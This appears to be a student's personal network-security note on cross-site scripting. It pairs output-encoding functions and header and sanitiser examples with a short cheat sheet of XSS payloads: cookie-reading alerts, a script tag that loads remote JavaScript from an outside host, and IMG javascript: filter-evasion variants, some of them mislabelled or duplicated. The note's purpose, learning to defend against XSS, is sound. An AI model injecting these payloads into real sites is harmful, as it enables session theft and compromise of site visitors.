XSS 防御
1.
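/**
 * Encode a value for insertion into HTML element content (the body of a
 * tag, not an attribute, script or URL).
 *
 * The six characters that can change how an HTML parser reads body text are
 * replaced by entities.  The value is coerced with '' + str first, so
 * null/undefined become the text "null"/"undefined" rather than throwing.
 *
 * @param {*} str - value to encode
 * @param {Object} [kwargs] - unused; kept so existing call sites still work
 * @returns {string} the encoded text
 */
function encodeForHTML(str, kwargs) {
  return ('' + str)
    .replace(/&/g, '&amp;')   // must run first, otherwise the entities added below get double-encoded
    .replace(/</g, '&lt;')    // DEC=> &#60; HEX=> &#x3c; Entity=> &lt;
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;')  // numeric form: &apos; is not an HTML4 entity
    .replace(/\//g, '&#x2F;'); // forward slash, so "</" cannot be formed inside the data
}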
2、
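/**
 * Encode a value for insertion into an HTML attribute value.
 *
 * Every character outside [A-Za-z0-9] whose UTF-16 code unit is below 256 is
 * emitted as a hex entity (&#xHH;), so quotes, spaces, '<', '=' and control
 * characters cannot close the attribute or start a new one.  Code units of
 * 256 and above are passed through unchanged, as in the original version.
 *
 * The original assigned `hex` without declaring it, creating an implicit
 * global (a ReferenceError in strict mode / ES modules); the temporary is now
 * block-scoped.
 *
 * @param {*} str - value to encode; coerced with '' + str
 * @param {Object} [kwargs] - unused; kept so existing call sites still work
 * @returns {string} the encoded attribute value
 */
function encodeForHTMLAttibute(str, kwargs) {
  const input = '' + str;
  const alnum = /[A-Za-z0-9]/; // no /g flag, so .test() is stateless
  let encoded = '';
  for (let i = 0; i < input.length; i++) {
    const ch = input[i];
    const code = input.charCodeAt(i);
    let out = ch;
    if (!alnum.test(ch) && code < 256) {
      out = '&#x' + code.toString(16) + ';';
    }
    encoded += out;
  }
  return encoded;
}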
3、
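/**
 * Encode a value for insertion inside a quoted JavaScript string literal.
 *
 * Characters outside [A-Za-z0-9] become a \xHH escape when their UTF-16 code
 * unit is below 256 and a \uHHHH escape otherwise, so quotes, backslashes,
 * '<', '/' and the line terminators U+2028/U+2029 cannot end the literal.
 *
 * Two defects in the original are fixed here: `hex` was an undeclared
 * (implicit global) variable, and \x escapes were not zero-padded, so a tab
 * produced "\x9" - a syntax error inside a string literal because \x needs
 * exactly two hex digits.
 *
 * @param {*} str - value to encode; coerced with '' + str
 * @param {Object} [kwargs] - unused; kept so existing call sites still work
 * @returns {string} the encoded string, without surrounding quotes
 */
function encodeForJavascript(str, kwargs) {
  const input = '' + str;
  const alnum = /[A-Za-z0-9]/; // no /g flag, so .test() is stateless
  let encoded = '';
  for (let i = 0; i < input.length; i++) {
    const ch = input[i];
    if (alnum.test(ch)) {
      encoded += ch;
      continue;
    }
    const code = input.charCodeAt(i);
    const hex = code.toString(16);
    // Fixed-width escapes: a hex digit that follows in the data must not be
    // absorbed into the escape sequence.
    encoded += code < 256
      ? '\\x' + ('0' + hex).slice(-2)
      : '\\u' + ('000' + hex).slice(-4);
  }
  return encoded;
}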
4、
/**
 * Encode a value for use as one URL component (a query-parameter value or a
 * path segment), never for a whole URL.
 *
 * Delegates to the built-in encodeURIComponent, which percent-encodes
 * everything except A-Z a-z 0-9 - _ . ! ~ * ' ( ).
 *
 * @param {*} str - value to encode
 * @param {Object} [kwargs] - unused; kept so existing call sites still work
 * @returns {string} the percent-encoded component
 */
function encodeForURL(str, kwargs) {
  const component = str;
  return encodeURIComponent(component);
}
5、
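/**
 * Encode a value for insertion into a CSS string or property value.
 *
 * Every character outside [a-zA-Z0-9] is emitted as a backslash escape
 * zero-padded to six hex digits (e.g. "\000020" for a space).  Always using
 * the full six digits means no following character can be read as part of
 * the escape, so no trailing space terminator is needed.
 *
 * The original did not compile: the `if` condition on the alphanumeric test
 * was missing its closing parenthesis.
 *
 * @param {string} attr - unused; kept so existing call sites still work
 * @param {*} str - value to encode; coerced with '' + str
 * @param {Object} [kwargs] - unused; kept so existing call sites still work
 * @returns {string} the encoded value
 */
function encodeForCSS(attr, str, kwargs) {
  const input = '' + str;
  const alnum = /[a-zA-Z0-9]/; // no /g flag, so .test() is stateless
  let encoded = '';
  for (let i = 0; i < input.length; i++) {
    const ch = input.charAt(i);
    if (alnum.test(ch)) {
      encoded += ch;
    } else {
      const hex = input.charCodeAt(i).toString(16);
      encoded += '\\' + ('000000' + hex).slice(-6);
    }
  }
  return encoded;
}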
6、
// Emits a cookie with the HttpOnly flag so that script (document.cookie) cannot read it.
// Nothing here sets `Secure`, so as written the cookie would also be sent over plain HTTP;
// add `Secure` (and consider `SameSite`) when the site is served over TLS.
// "cookiename", "value", "domainvalue" and "seconds" are placeholders to be filled in.
// NOTE(review): presumably a Servlet HttpServletResponse; setHeader replaces any Set-Cookie
// already queued on the response, whereas addHeader/addCookie append - confirm which is intended.
response.setHeader("Set-Cookie","cookiename=value; Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
7、
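// Sanitise untrusted HTML with OWASP AntiSamy before it is persisted: the policy
// file decides which tags/attributes survive, and only the cleaned output is stored.
// The original declared the variable as `ploicy` and then used `policy`, which does not compile.
Policy policy = Policy.getInstance(POLICY_FILE_LOCATION);
AntiSamy as = new AntiSamy();
// scan() declares checked exceptions (ScanException, PolicyException); the enclosing
// method must handle or propagate them.
CleanResults cr = as.scan(dirtyInput, policy);
MyUserDao.storeUserProfile(cr.getCleanHTML());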
8、
<%-- Raw EL output: ${username} is written into element content with no escaping. --%>
<span>${username}</span>
<%-- <c:out> escapes XML by default (escapeXml="true"), so < > & ' " in username are entity-encoded. --%>
<p><c:out value="${username}"></c:out></p>
<%-- Raw EL inside an attribute value: a " in username would close the value attribute. --%>
<input type="text" value="${username}" />
9、
<!-- IIS web.config fragment: adds X-Frame-Options to every response so other
     origins cannot frame the site (clickjacking). SAMEORIGIN still permits
     framing by pages of the same origin. The CSP frame-ancestors directive is
     the standardised successor and can be sent alongside this header. -->
<system.webServer>
...
<httpProtocol>
<customHeaders>
<add name="X-Frame-Options" value="SAMEORIGIN" />
</customHeaders>
</httpProtocol>
10.
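<!-- ${myUrl} is interpolated unencoded into a JavaScript string that itself
     sits inside an HTML attribute. Encode for the innermost context first:
     apply encodeForJavascript, then encodeForHTMLAttibute, before emitting it.
     The attribute name below was mis-encoded in the original (a Greek omicron
     in place of the Latin "o"), so the browser would not have treated it as
     an event handler at all. -->
<input type="button" onclick='go_to_url("${myUrl}");' />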
XSS 攻击
1.获取用户的cookie
<script>alert(document.cookie)</script>
οnclick=alert(document.cookie)
2. Disrupt page layout
<iframe src="http://baidu.com"></iframe>
<script>alert("hello")</script>
3. Normal XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
4.IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5.IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>
6.IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
7.HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>
8.修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9.formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
10.嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
NEU网络攻防XSS--Attack(个人笔记,仅供参考)